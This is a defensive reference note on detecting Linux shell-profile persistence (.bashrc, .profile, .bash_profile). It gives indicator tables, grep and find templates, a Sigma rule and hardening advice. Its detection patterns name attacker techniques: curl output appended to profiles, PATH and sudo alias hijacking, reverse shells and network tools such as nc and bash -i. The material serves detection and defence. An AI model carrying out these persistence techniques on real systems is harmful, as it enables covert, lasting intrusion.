This note documents detection patterns related to Bash Profile Persistence on Linux systems.
Direct Indicators
| Source | Grep Pattern / Artifact | Meaning | Forensic Value | Notes |
|---|
| Shell artifact | .bashrc modified | Interactive shell persistence | Critical | Most common user-shell persistence path. |
| Shell artifact | .profile modified | Login shell persistence | Critical | Executes on login. |
| Shell artifact | .bash_profile modified | Login persistence | Critical | Common in privileged accounts. |
| Shell history | echo command >> .bashrc | Manual persistence insertion | Critical | Direct attacker action. |
| Shell history | curl ... >> .bashrc | Payload persistence | Critical | Strong malicious signal. |
| Shell history | export PATH= | PATH hijack persistence | Critical | Common stealth method. |
| Shell history | alias sudo= | Command hijack | High | Operator trick / persistence. |
| Hidden command in shell profile | silent payload | Critical | Strong stealth indicator. | |
| Reverse shell in profile | callback persistence | Critical | High severity. | |
| File timestamps | recent profile modification | Timeline anchor | Critical | Strong forensic truth. |
auditd | write to profile files | Process attribution | Critical | Best attribution if enabled. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|
| Profile modified after root shell | Persistence after escalation | Critical | Strong hostile sequence. |
| Profile plus hidden payload path | Linked persistence chain | Critical | Strong operator discipline. |
| Profile change then outbound connection | Callback persistence | Critical | Very strong signal. |
| PATH altered unexpectedly | Hijack possibility | Critical | Strong privilege abuse clue. |
| Alias added silently | Command interception | High | Subtle persistence. |
Common Tools
| Tool | Usage |
|---|
echo | Append persistence command. |
cat >> | Inject block into profile. |
sed -i | Inline modification. |
Relevant Artifacts
| Artifact | Path / Command | Forensic Value | Notes |
|---|
.bashrc | user shell persistence | Critical | Primary artifact. |
.profile | login persistence | Critical | Primary artifact. |
.bash_profile | login persistence | Critical | Common root target. |
| File timestamps | stat | Critical | Timeline truth. |
| Shell history | .bash_history | Critical | Modification evidence. |
MITRE ATT&CK References
- T1546 Event Triggered Execution
- T1546.004 Unix Shell Configuration Modification
Decision Tree
- Which profile changed?
- What command inserted?
- Does it trigger callback / payload?
- Which account affected?
- Was cleanup attempted?
Example Detection Templates
Grep
grep -R "bashrc\|bash_profile\|profile" /home/*/.bash_history /root/.bash_history 2>/dev/null
Journalctl
journalctl | grep bash
File Inspection
find /home /root -name ".bashrc" -o -name ".profile" -o -name ".bash_profile" -exec stat {} \; 2>/dev/null
grep -R "curl\|wget\|nc\|bash -i\|python" /home/*/.bashrc /home/*/.profile /root/.bashrc /root/.profile 2>/dev/null
Sigma
title: Linux Bash Profile Persistence
id: linux-bash-profile-persistence
status: experimental
description: Detects suspicious shell profile modification used for persistence
logsource:
product: linux
detection:
selection_keywords:
message|contains:
- '.bashrc'
- '.profile'
- '.bash_profile'
condition: selection_keywords
level: high
tags:
- attack.persistence
- attack.t1546.004
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|
| Profile review | Baseline shell startup files | Critical | Detect rogue inserts. |
| Auditd | Track profile writes | High | Strong attribution. |
| Least privilege | Restrict shell write abuse | High | Reduces persistence paths. |
